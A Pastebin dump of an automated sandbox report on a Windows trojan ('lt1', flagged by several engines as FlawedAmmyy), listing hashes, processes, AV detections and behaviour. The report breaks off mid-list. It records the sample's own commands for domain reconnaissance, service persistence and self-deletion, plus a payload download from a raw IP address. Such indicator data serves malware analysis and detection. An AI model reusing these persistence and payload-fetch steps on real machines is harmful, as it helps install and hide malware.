Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "lt1"
- [*] File Size: 159488
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "b07340bd812ac1d6bab85b1b49c4e935f100b17d59da632533c8ddd361529f10"
- [*] MD5: "2fcfddd92568af831a6f8febb817c900"
- [*] SHA1: "0e5f89ff146d7b1b6af5826a67fad93cdb3f7657"
- [*] SHA512: "4b11d0ff41ab6a58aad3de510fab8172521345372724047911355babd2bbfa32dc4fc2adff138de852de5fa3ca3ecbfafeff99d790eb6d000b8b397f3a312b9e"
- [*] CRC32: "853324A9"
- [*] SSDEEP: "3072:1k7WT8wAl28+h9VbjXKvKmeykXWlZrT8JUPQImMJ2szDHqldYPaShV1C8/Wn:1kHhl28+VbjXKvKmeykiZT8AQImz7YSB"
- [*] Process Execution: [
- "lt1.exe",
- "net.exe",
- "net1.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "services.exe",
- "wsus.exe",
- "wsus.exe",
- "svchost.exe",
- "svchost.exe",
- "msiexec.exe",
- "GoogleUpdate.exe",
- "svchost.exe",
- "taskhost.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
- "Details": [
- {
- "IP": "185.106.122.120:80"
- },
- {
- "IP": "172.217.11.163:443"
- }
- ]
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "A process attempted to delay the analysis task.",
- "Details": [
- {
- "Process": "wsus.exe tried to sleep 599 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
- "Details": [
- {
- "ioc": "http://crl.globalsign.net/root-r2.crl0"
- }
- ]
- },
- {
- "Description": "Reads data out of its own binary image",
- "Details": [
- {
- "self_read": "process: wsus.exe, pid: 1720, offset: 0x00000000, length: 0x00000400"
- }
- ]
- },
- {
- "Description": "A process created a hidden window",
- "Details": [
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> cmd"
- },
- {
- "Process": "lt1.exe -> C:\\Windows\\System32\\cmd.exe"
- }
- ]
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\ProgramData\\NuGets\\wsus.exe"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- },
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://185.140.248.17/01.dat"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D"
- },
- {
- "suspicious_request": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
- },
- {
- "suspicious_request": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D"
- },
- {
- "suspicious_request": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
- },
- {
- "suspicious_request": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
- },
- {
- "suspicious_request": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
- },
- {
- "suspicious_request": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
- },
- {
- "suspicious_request": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://185.140.248.17/01.dat"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- },
- {
- "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D"
- },
- {
- "url": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
- },
- {
- "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
- },
- {
- "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
- },
- {
- "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
- },
- {
- "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
- },
- {
- "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
- },
- {
- "url": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D"
- },
- {
- "url": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
- },
- {
- "url": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
- },
- {
- "url": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
- },
- {
- "url": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
- },
- {
- "url": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
- }
- ]
- },
- {
- "Description": "Deletes its original binary from disk",
- "Details": []
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 11852309 times"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "service name": "foundation"
- },
- {
- "service path": "C:\\ProgramData\\NuGets\\wsus.exe -service"
- }
- ]
- },
- {
- "Description": "File has been identified by 19 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "FireEye": "Generic.mg.2fcfddd92568af83"
- },
- {
- "Alibaba": "Trojan:Win32/Kryptik.24c3281f"
- },
- {
- "Invincea": "heuristic"
- },
- {
- "Symantec": "Trojan.Flawedammyy"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Kaspersky": "HEUR:Trojan.Win32.Generic"
- },
- {
- "Rising": "Trojan.Kryptik!8.8 (CLOUD)"
- },
- {
- "McAfee-GW-Edition": "Artemis!Trojan"
- },
- {
- "SentinelOne": "DFI - Suspicious PE"
- },
- {
- "ESET-NOD32": "a variant of Win32/Kryptik.GTDL"
- },
- {
- "Endgame": "malicious (high confidence)"
- },
- {
- "ZoneAlarm": "HEUR:Trojan.Win32.Generic"
- },
- {
- "AhnLab-V3": "Downloader/Win32.FlawedAmmyy.C3289538"
- },
- {
- "McAfee": "Artemis!2FCFDDD92568"
- },
- {
- "VBA32": "BScope.Trojan.Zenpak"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "Ikarus": "Trojan.Win32.Crypt"
- },
- {
- "AVG": "FileRepMalware"
- },
- {
- "CrowdStrike": "win/malicious_confidence_90% (W)"
- }
- ]
- }
- ]
- [*] Started Service: [
- "foundation",
- "msiserver",
- "gupdate"
- ]
- [*] Executed Commands: [
- "net group /domain",
- "\"C:\\Windows\\System32\\cmd.exe\" /C net.exe stop foundation",
- "cmd /C net.exe stop foundation",
- "\"C:\\Windows\\System32\\cmd.exe\" /C sc delete foundation",
- "cmd /C sc delete foundation",
- "\"C:\\Windows\\System32\\cmd.exe\" /C sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
- "cmd /C sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
- "\"C:\\Windows\\System32\\cmd.exe\" /C net.exe start foundation y",
- "cmd /C net.exe start foundation y",
- "C:\\Windows\\System32\\cmd.exe /c del C:\\Users\\user\\AppData\\Local\\Temp\\lt1.exe >> NUL",
- "C:\\Windows\\system32\\net1 group /domain",
- "net.exe stop foundation",
- "sc delete foundation",
- "C:\\Windows\\system32\\net1 stop foundation",
- "sc create foundation binPath= \"C:\\ProgramData\\NuGets\\wsus.exe -service\" type= own start= auto error= ignore",
- "net.exe start foundation y",
- "C:\\Windows\\system32\\net1 start foundation y",
- "C:\\ProgramData\\NuGets\\wsus.exe -service",
- "C:\\Windows\\system32\\svchost.exe -k netsvcs",
- "C:\\Windows\\system32\\msiexec.exe /V",
- "\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc",
- "C:\\Windows\\System32\\svchost.exe -k netsvcs",
- "\"C:\\ProgramData\\NuGets\\wsus.exe\" -nogui"
- ]
- [*] Mutexes: [
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "DBWinMutex",
- "Broiduti#3483488**#",
- "Global\\_MSIExecute",
- "Global\\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}",
- "Global\\G{6885AE8E-C070-458d-9711-37B9BEAB65F6}",
- "Global\\G{66CC0160-ABB3-4066-AE47-1CA6AD5065C8}",
- "Global\\G{0A175FBE-AEEC-4fea-855A-2AA549A88846}"
- ]
- [*] Modified Files: [
- "\\Device\\NamedPipe",
- "C:\\ProgramData\\NuGets\\template_41c318.TMPTMPZIP7",
- "C:\\ProgramData\\NuGets\\wsus.exe",
- "\\??\\PIPE\\wkssvc",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
- "\\??\\WMIDataDevice",
- "\\??\\PIPE\\samr",
- "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
- "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
- "\\??\\NUL",
- "C:\\Windows\\Installer\\23b7c89.msi",
- "C:\\Windows\\Installer\\23b7c8a.msi",
- "\\??\\pipe\\GoogleCrashServices\\S-1-5-18",
- "C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat",
- "C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat"
- ]
- [*] Deleted Files: [
- "C:\\ProgramData\\Microsoft Help\\wsus.exe",
- "C:\\ProgramData\\NuGets\\wsus.exe",
- "C:\\ProgramData\\NuGets\\template_41c318.TMPTMPZIP7",
- "C:\\Users\\user\\AppData\\Local\\Temp\\lt1.exe",
- "C:\\Windows\\Installer\\23b7c89.msi",
- "C:\\Program Files (x86)\\Google\\Update\\Install\\{0E51DEF1-ED79-4FDA-92A7-D7F8B9999365}\\GoogleUpdateSetup.exe",
- "C:\\Program Files (x86)\\Google\\Update\\Install\\{0E51DEF1-ED79-4FDA-92A7-D7F8B9999365}"
- ]
- [*] Modified Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\msiserver\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\gupdate\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\netsxuid",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
- "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}\\PersistedPingString",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{8789A270-6461-4B27-AA47-830514BDA0FF}\\PersistedPingTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\pv",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\pv",
- "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\CurrentState",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\CurrentState\\StateValue",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000_CLASSES\\Local Settings\\MuiCache\\2E\\52C64B7E\\LanguageList",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Google\\Update\\proxy\\source",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\RollCallDayStartSec",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\DayOfLastRollCall",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\ping_freshness",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\(Default)",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\hint",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\cohort\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\LastCheckSuccess",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\dr",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\ActivePingDayStartSec",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\RollCallDayStartSec",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\DayOfLastActivity",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\DayOfLastRollCall",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\ping_freshness",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\(Default)",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\hint",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\cohort\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\UpdateAvailableCount",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\UpdateAvailableSince",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\LastChecked",
- "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}\\PersistedPingString",
